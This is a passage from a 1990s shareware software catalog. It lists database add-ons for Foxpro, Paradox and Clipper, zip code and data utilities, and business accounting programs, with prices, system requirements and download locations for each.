Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $45.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; SHL.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 372k (about 28 minutes with a 2400 baud modem) + Description: + A Foxpro application that will allow the user to launch + selected and password protected Foxpro applications. Passwords + can be maintained by user or application. + + Chapter 5, "Database applications" 240 + + + + Product: Sub-contracor Billing + Author: C & R Business Systems Ltd. (Dennis Allen), 616-281-3333 + Version: 2.2.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; JOB.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 429k (about 32 minutes with a 2400 baud modem) + Description: + A Foxpro application designed to record and track sub- + contractor billing. Among its features is the ability to run + in a multi-user enviroment. It can access invoices by either + invoice number or client code. It can also record a single + check payment of multiple invoices. + + + Product: Version Control & Maintenance + Author: C & R Business Systems Ltd. (Dennis Allen), 616-281-3333 + Version: 2.8.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; VCM.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 473k (about 35 minutes with a 2400 baud modem) + Description: + Lets either the client or the programmer maintain their + database of source code. As the client, it lets you obtain the + latest source code. As a programmer, it lets you maintain + another programmer's database of code. At the same time, other + programmers can keep up with your modifications. All without + the need to 'check-out' program files. + + + Product: WordLink(TM) + Drag & drop data from database to MSWord docs. See full + description on page 207. + + Chapter 5, "Database applications" 241 + + + + 5.6.4 For Paradox + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 221. + + Product: Report Utility for Paradox/DOS + Author: The C Group, Inc. (Mark Cohen), 718-251-1891 + Version: 2.04 (02-12-94) + Needs: IBM PC, DOS 3.3 or better. 2048k RAM. Paradox for DOS + version 3.5-4.5. + Registration fee: $15.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy. Lifetime free + upgrading allowed. 1 free update disk(s) sent out. + Look for: RPTUTL.ZIP on BBSs (call 718-241-0225 to download it at + no charge); RPTUTL.ZIP on CompuServe in CIS:PDOXDOS forum + LIBrary 13 (or contact userID 76670,2602 for assistance). + SWREG#: 2004 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Lets you move, copy and sumamrize fields and calculated fields + on a Paradox Report. This is a definite must for any users of + Paradox/Dos. It gives you the functionality Borland left out. + Considerably less expensive than other programs of its type. + + + Product: WordLink(TM) + Drag & drop data from database to MSWord docs. See full + description on page 207. + + Chapter 5, "Database applications" 242 + + + + 5.6.5 For Clipper + + Product: Builder + Author: Aeolus Software, 612-730-4135 + Version: 2.2 (10-27-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; CGA monitor; Hard + disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $59.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of unlimited phone, CompuServe, mail support; royalty- + free source code; bonus utilities; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: availability unknown on BBSs. + PsL#: 11233 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + A Clipper(tm) program source code generator. Create colorful + windowing text applications quickly and easily. Select from + several menu styles and window appearances. Automatic file + maintenance for primary and relation tables. Select from many + canned VALIDs. Memo field support. TBrowse and drop down + lists new to this version. Creates mouseable applications. + Report code generator also included. All your Clipper + programming needs in one package! + + + Product: DBKIT + Xbase programming & maintenance. See full description on + page 235. + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 45. + + Product: Workbase + Dot-prompt utility for DBMS programmers. See full description + on page 235. + + 5.6.6 For other + + Product: RI-VB Database Toolkit v1.1 + Utility to develop VB and Access apps. See full description on + page 416. + + Chapter 5, "Database applications" 243 + + + + Product: SC-Scripter + Author: SplitCycle Computing, 904-292-4770 + Version: 1.0 (08-27-94) + Needs: IBM 80386, DOS 3.3 or better. 200k RAM; Network (LAN). + NetLib for SQL Server from Microsoft/Sybase. + Registration fee: $39.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, CompuServe, mail support; all ASP-wide offers (see + page 6). 12-month free upgrading allowed. + Look for: availability unknown on BBSs; SCSCRP.ZIP on CompuServe + in CIS:SYBASE forum LIBrary 13 (or contact userID 73501,1261 + for assistance). + SWREG#: 3341 + Download size: 91k (about seven minutes with a 2400 baud modem) + Description: + A fast and easy SQL server management assistant that can + increase developer and database administrator productivity. It + will generate Transact-SQL scripts for entire databases or + individual objects. Its command line interface allows database + definitions to be generated as part of your complete backup + procedures. Can be a valuable tool in moving, restoring and + examining databases. + + Chapter 6, "Data" 244 + + + + + + Chapter 6 + Data + + + 6.1 Words + + Product: Curses! + Creative insult generator. See full description on page 604. + + 6.1.1 Names + + Product: HangWin + Hangman word game with sound. See full description on + page 626. + + + 6.2 Mapping data + + See also: Engineering, Surveying & cartography; Graphics, + Business applications, Mapping/cartography. + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 502. + + Product: PMFLCOMP + ASCII/hex/checksum file compare for OS/2. See full description + on page 42. + + Product: VERSAMAP + Draws outline maps on 14 map projections. See full description + on page 503. + + + 6.3 Corporate data + + Product: I&M USA + Mfr. directory for process controls. See full description on + page 351. + + + 6.4 World facts + + Product: On This Day + "What happened on this day in history?" See full description + on page 470. + + Product: On This Day for Windows + "What happened on this day in history?" See full description + on page 470. + + Chapter 6, "Data" 245 + + + + Product: Wynter Stone's Quick Guide + Mini-encyclopedia of mystical information. See full + description on page 532. + + + 6.5 Zip codes + + Product: Zip Express + Zip Code look up and auto-paster. See full description on + page 318. + + Product: ZIPKEY + Author: Eric Isaacson Software, 812-339-1811 + Version: 2.04e (05-01-93) + Needs: IBM PC, DOS 2.0 or better. 22k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, BBS, CompuServe, + mail support; 1-month return policy; bonus data. + Look for: ZK*.ZIP on BBSs (call 812-855-7252 to download it at no + charge); ZIPKEY.ZIP on CompuServe in CIS:ZIPKEY forum LIBrary + 14 (or contact userID 71333,3154 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Awards & nominations: 1992 finalist, Shareware Industry Awards. + 1989 winner, Public Brand Software contests for useful + programs. + Description: + A complete city-level database of zip codes and telephone area + codes, combined with a keyboard enhancement program. Will pop + up over your text-mode application, look up a zip code, and + feed the results via keystrokes to your application. May be + configured to generate any sequence of keystrokes you wish. + Incredibly fast and compact. You can literally type a city, + state, zip code, and area code in seven keystrokes. + + Chapter 6, "Data" 246 + + + + Product: Zippidy Do Da(tm) + Author: SMI Corporation, 918-241-2301 + Version: 1.3 (02-27-95) + Needs: IBM 80386, Windows 3.1 or better. 3072k RAM; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $25.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Look for: ZDD130*.ZIP on BBSs (multiple files) (call 918-747-2542 + to download it at no charge); ZIPDODA.ZIP on CompuServe in + CIS:WINPROD forum LIBrary 14 (or contact userID 72644,2335 for + assistance). + SWREG#: 5625 + Download size: 1889k (about 140 minutes with a 2400 baud modem) + Description: + Searches by zip code, state, area code, city or the sound of + the city name. Very visual user interface with context + sensitive help. Supports reporting and custom reports via SQL + queries. Even shows the time at the selected city vs. your + local time. Very useful! + + + 6.6 Area codes + + Product: PCFDial + Powerful 7k TSR voice/fax screen autodialer. See full + description on page 127. + + Product: Zip Express + Zip Code look up and auto-paster. See full description on + page 318. + + Product: ZIPKEY + TSR Zip Code & area code keyboard enhancement. See full + description on page 245. + + Product: Zippidy Do Da(tm) + Zipcode/areacode lookup tool with time info. See full + description on page 245. + + + 6.7 Engineering data + + See also: Engineering. + + 6.7.1 For mechanical engineering + + Product: Nominal Pipe Size for Windows + Displays data for different sizes of pipe. See full + description on page 354. + + Chapter 6, "Data" 247 + + + + Product: PLOTTER + Data plotting and analysis program. See full description on + page 383. + + Product: Water and Steam Properties + Properties of ice, water and steam. See full description on + page 347. + + 6.7.2 For other + + Product: I&M USA + Mfr. directory for process controls. See full description on + page 351. + + Product: INSTINDX + Instr index, prints lists and data sheets. See full + description on page 344. + + Product: Nominal Pipe Size for Windows + Displays data for different sizes of pipe. See full + description on page 354. + + Product: Periodic Table + Electronic table of elements with decay data. See full + description on page 475. + + Product: WinDatCon + Windows data conversion program. See full description on + page 115. + + + 6.8 Quotes & anecdotes + + See also: Home & hobby, Quotes & anecdotes. + + Chapter 6, "Data" 248 + + + + Product: PC-Fortune + Author: JAYAR Systems, 416-751-5678 + Version: 2.20 (09-30-92) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $24.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; + royalty-free runtime license; bonus data; all ASP-wide offers + (see page 6). + Look for: PCF220.ZIP on BBSs (call 519-940-0007 to download it at + no charge). + Download size: 187k (about 14 minutes with a 2400 baud modem) + Description: + A "fortune cookie" program that selects and displays a fortune + at random from its data base of over 2,200 fortunes, quotes, + sayings, jokes, etc. A different item is selected each time + until all have been displayed, then it starts over. You may + also select items by number. Program can run from command line + or from AUTOEXEC.BAT. + + + 6.9 Encyclopedias + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 221. + + + 6.10 Government data + + 6.10.1 Federal data + + 6.10.1.1 Census data + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 502. + + + 6.11 Software tools & add-ins + + 6.11.1 For multiple programs + + Product: TURBO TPU TOOLKIT! + Pascal math function toolkit. See full description on + page 422. + + Chapter 7, "Business" 249 + + + + + + Chapter 7 + Business + + See also: Spreadsheet applications; Database applications, + Mailing list systems; Data; Communications, Call logging & + analysis; Finances; Graphics, Business applications. + + + 7.1 Business finances + + See also: Finances, Personal finances. + + Product: Amortz - Loan Schedules & More! + Easy loan calculation system. See full description on + page 339. + + Product: EXPRESSCALC + Powerful, easy-to-use. Great for home, office. See full + description on page 216. + + Product: FeeRate for Windows + Calculate fees based on desired yearly salary. See full + description on page 117. + + Product: FeeRate for Windows 95 / NT + Author: Tesserax Information Systems, 714.841.0616 + Version: 2.0 (03-24-96) + Needs: IBM 80386, Windows NT 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: SVGA monitor. + Registration fee: $10.00 (add $2.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $7.95 for shipping outside U.S. or Canada) + Registration benefits: 12 months of phone, fax, CompuServe, mail + support; royalty-free runtime license; all ASP-wide offers (see + page 6). 6-month free upgrading allowed. + Look for: availability unknown on BBSs; FR20.ZIP on CompuServe in + CIS:MS forum LIBrary 0 (or contact userID 72247,1463 for + assistance). + Download size: 608k (about 45 minutes with a 2400 baud modem) + Description: + An hourly fee rate calculator for professional and consultants + who bill clients by the hour. By simply entering the expected + yearly values for business expenses, desired salary, benefits, + number of weeks worked, and number of daily billing hours, + FeeRate will calculate the $/hr rate to charge clients. Because + of the unbiased nature of calculating fees, it can be used by + any professional in any field to establish their fees. + + Chapter 7, "Business" 250 + + + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 328. + + Product: Financial Freedom + Complete finance management for Windows. See full description + on page 332. + + Product: Financial Freedom GOLD + Our high-end money management for Windows. See full + description on page 332. + + Product: Good Credit + Author: Cordes Development (Bernd J. Cordes), +49-40-494370 + Version: 1.2 (08-18-85) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $10.00 + Registration benefits: lifetime unlimited phone, fax, CompuServe, + mail support; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; CREDTE12.ZIP on + CompuServe in CIS:WINBIZ forum LIBrary 5 (or contact userID + 100334,375 for assistance). + SWREG#: 7077 + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + A utility for verifying credit card numbers. Supports Visa, + MasterCard/Eurocard, American Express, Discover, and others. + + + Product: Inventory Interface + Full featured inventory, MRP and POS package. See full + description on page 272. + + Chapter 7, "Business" 251 + + + + Product: Money Math for Windows + Author: Lovell's (Robert W. Lovell), 864-224-2474 + Version: 2.1 (07-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: VGA monitor. + Registration fee: $26.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + 3-month return policy; bonus data; all ASP-wide offers (see + page 6); discounts on upgrades. 3-month free upgrading allowed. + Look for: MOMATH4.ZIP on BBSs; MOMATH.ZIP on CompuServe in + CIS:INVESTORS' forum LIBrary 7 (or contact userID 70404,3470 + for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Provides financial analysis tools for calculating a variety of + problems including Annuities, Bonds, Discounted cash flow, and + Amortization Schedules. Handle more complex problems with + Worksheets to find savings in refinancing or prepaying + mortgages or doing retirement planning. + + Uses 17 dialog boxes for over 50 different types of financial + calculations. Has extensive Windows help including 16 detailed + examples. Results can be edited, printed, or saved to a file. + + + Product: PCLoan5 + Author: Bottom Line Software, Inc., 214-394-4087 + Version: 5.09 (09-01-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM. + Registration fee: $79.97 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A professional loan/mortgage/lease amortization system. + Supports all common methods of simple interest calculation + including daily interest, periodic interest, variable rates, + and negative amortization. + + All schedules are stored on disk and may be edited, + recalculated, viewed, or printed, repeatedly. Any loan term may + be changed at any time (even between payments). Non-scheduled + payments may be added and scheduled payments may be deleted. + + Chapter 7, "Business" 252 + + + + Calculator provides REG-Z APR, including points. + + + Product: WinCharging + Author: My Little Realm Enterprises, 201-529-8318 + Version: 2.0 (03-24-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Registration fee: $24.95 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, CompuServe, + mail support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Free WinCharging backup disk. + Look for: WINCRG20.ZIP on BBSs; WINCRG.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (or contact userID 70761,2175 for + assistance). + PsL#: 11734 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Ziff-Davis called it a "sophisticated credit card management + system ... for detail-oriented people." It displays + outstanding amounts; monitors credit limits and target amounts; + charts, displays and prints all kinds of reports; and much + more. Now Win95 compatible and works with international date + and currency formats using Roman alphabet. Comes with a + special help file that gets you set up and running fast. Also + works great under Warp in a Windows full-screen or seamless + session. + + + 7.1.1 Business accounting + + Product: Bottom Line Accounting + Author: WindSoft International, Inc. (Van B. Hooper, III), + 407-240-2300 + Version: 2.5E (02-04-94) + Needs: IBM 80386, DOS 4.0 or better. 2048k RAM; Hard disk. + Registration fee: $499.95 (add $7.00 for shipping to U.S. + addresses) (add $11.00 for shipping to Canadian addresses) (add + $33.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + 1-month limited return policy; all ASP-wide offers (see + + Chapter 7, "Business" 253 + + + + page 6); discounts on other products. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs; BLA-?.EXE on CompuServe + in CIS:PCAPP forum LIBrary 5 (multiple files) (or contact + userID 75300,562 for assistance). + Download size: 5120k (about 380 minutes with a 2400 baud modem) + Description: + Easy to learn/use. No month-end closings required. Allows pre + and post-dated transactions. Unlimited transactions. On-the- + fly transactions/check writing. Allows errors to be easily + corrected. Context sensitive help screens. Complete reports & + graphs. Supports W-2's & 1099's. Paradox file structure. + Import/export/merge data files. Built-in backup. Drop-to-DOS + feature. Quick installation & setup. + + + Product: Business Clock Link + Time clock w/ job reporting, E-mail, network. See full + description on page 280. + + Product: DAYO ACCOUNTS PAYABLE (AP) + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOVE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOVE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + The 'final chapter' to the processing and maintenance of all + your Payables. Its key mission is to process/post your purchase + orders, however, many other routines have been provided, ie: + expense maintenance, 1099 MISC forms, purchase clearing, vendor + maintenance, hand/manual checks, batch checks, recurring + checks, unlimited bank accounts, unlimited check printing + formats and many reports. + + Chapter 7, "Business" 254 + + + + Product: DAYO ACCOUNTS RECEIVABLE (AR) + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOAE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOAE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + The 'final chapter' to the processing and maintenance of all + your receivables. Includes routines to handle cash receipts, + customers, invoice types, terms, taxcodes, sales persons, and + more. Many reports are included (ie: Ageing, Customer, Sales... + ). There is a routine to print Statements (ie: SMART, 90, 60, + 30 days), and another one to create and print 'non' standard + invoices (not applicable to DAYO POS). HP laser forms are + provided as an option for statements and invoices. + + + Product: DAYO GENERAL LEDGER (GL) + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.60+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOGE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOGE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Provides a means to manage and report company finances. Totally + integrated with the other DAYO packages. Features include + computer generated posting, multiuser, double entry, export + data, 30+ reports, budget management and unlimited accounts. + + Chapter 7, "Business" 255 + + + + Product: DAYO TIME & BILLING + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOTE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOTE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + Comprises a system of creating invoices for services and/or + products. It has support for an inventory, receivables, + projects and customers/clients. Other features include: + multiuser, unlimited records, project notes, customer notes, + 30+ reports, onscreen viewing of reports, databases are dBase + (tm) compatible, laser formats for invoices and statements, 2 + styles of statements/bills, printer setup & drivers and cash + drawers drivers. + + + Product: EXPRESSCHECK + Menu driven checkbook manager. See full description on + page 335. + + Product: Fixed Asset Pro + Author: HammerSoft, Inc., 419-986-6007 + Version: 2.1 (07-15-95) + Needs: IBM PC, DOS 3.0 or better. 480k RAM; Hard disk. + Registration fee: $79.95 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 2-month return policy; discounts on other products. + Look for: availability unknown on BBSs; FAPRO.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 5 (multiple files) (or contact + userID 71540,3266 for assistance). + Download size: 475k (about 35 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A comprehensive fixed asset depreciation system. Using pull + down menus the program calculates depreciation on multiple + bases, applies tax limits, performs projections and + comparisons, and prints reports to screen, printer or file. + + Chapter 7, "Business" 256 + + + + Provides 38 U.S. tax law depreciation methods with online help. + Mouse support. Manual includes a tutorial. + + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 118. + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 296. + + Product: Loan Master + Author: Bottom Line Software, Inc., 214-394-4087 + Version: 1.52.14 (10-01-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Epson printer. + Registration fee: $495.00 (Canadian dollars) (add $3.00 (Canadian + dollars) for shipping to U.S. addresses) (add $10.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 2 months of phone, fax, + BBS, newsletter, mail support; all ASP-wide offers (see + page 6); discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs. + Download size: 700k (about 52 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A complete loan accounting and tracking system that maintains + and reports interest and late charges due. Prints trial + balances, past due, payments received, and loan transaction + statements. Prints past due and billing notices. Prints year + end statements. Maintains an optional escrow balance. Has + options to compute daily interest accruals or to track an + amortization schedule. + + Chapter 7, "Business" 257 + + + + Product: Paper Route Ledger + Author: RMH Computer Services (Richard Holler), 317-782-9903 + Version: 1.47 (01-03-95) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Strongly recommended: Hercules monitor; Epson printer. + Registration fee: $19.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited BBS, CompuServe, + mail support; 1-month return policy; all ASP-wide offers (see + page 6). + Look for: PRL147.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PRL.ZIP on CompuServe in CIS:PCAPP forum LIBrary 5 + (or contact userID 73567,1547 for assistance). + SWREG#: 2446 + Download size: 312k (about 23 minutes with a 2400 baud modem) + Description: + Computerize and automate your paper route bookkeeping with this + unique program. Keeps track of customers, addresses, delivery + route order, route listing, collections, billings, tips, etc. + Print reports on your customer list, collections, route + listing, etc. Will handle multiple Delivery types (i.e. weekly, + weekdays only, weekends only, etc). Handles direct pay and + customers who pay through the newspaper offices. + + + Product: PC-AP + Author: Medlin Accounting Shareware, 707-255-4475 + Version: 1.8 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 71520,61 for assistance); MEDLIN.ZIP on + GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple accounts payable program integrated with PC-GL. + Allows you to quickly enter vendors, enter invoices, choose + invoice for payment and print checks. Reports include check + listing, invoice listing, vendor listing, vendor activity + report and mailing labels. Allows up to 2000 vendors and 2000 + invoices/checks per month. Invoices and checks may be sorted + by any field. Maintains check book balance and posts checks to + PC-GL each month. Can read payroll checks from our PC-PR. + + + Product: PC-AR + Accounts receivable. See full description on page 264. + + Chapter 7, "Business" 258 + + + + Product: PC-FOOD II FOOD COSTING + Professional food costing. See full description on page 294. + + Product: PC-GL + Author: Medlin Accounting Shareware, 707-255-4475 + Version: 3.8 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; discounts on upgrades. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 71520,61 for assistance); MEDLIN.ZIP on + GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple general ledger program. It includes an easily + modified standard chart of accounts. The program prints an + income statement with current, year to date and prior year + percents and a three column balance sheet. Other reports + include a general ledger for current and year to date and a + number of different transaction listings. Each entry is + instantly verified. Allows up to 800 items in the chart of + accounts and up to 8000 transactions per month. + + + Product: PC-PR + Payroll writing. See full description on page 268. + + Product: PCINV + Author: Medlin Accounting Shareware, 707-255-4475 + Version: 1.3 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Epson printer. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 71520,61 for assistance); MEDLIN.ZIP on + GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple invoice writing program integrated with the PC- + AR program. Enter up to 50 lines of 42 character invoice + detail. Calculates sales tax on taxable items. Allows + multiple line descriptions which can include costs times + amount. Prints on 7" or 11" preprinted forms or plain paper. + Prints invoices as you enter them and does not allow for batch + printing or editing previous invoices. Invoices are immediately + posted to PC-AR. Handles multiple tax rates. + + Chapter 7, "Business" 259 + + + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 330. + + Product: Time is Money + A time and fixed price billing system. See full description on + page 265. + + Product: WInvoices + Invoicing program and much more! See full description on + page 266. + + 7.1.2 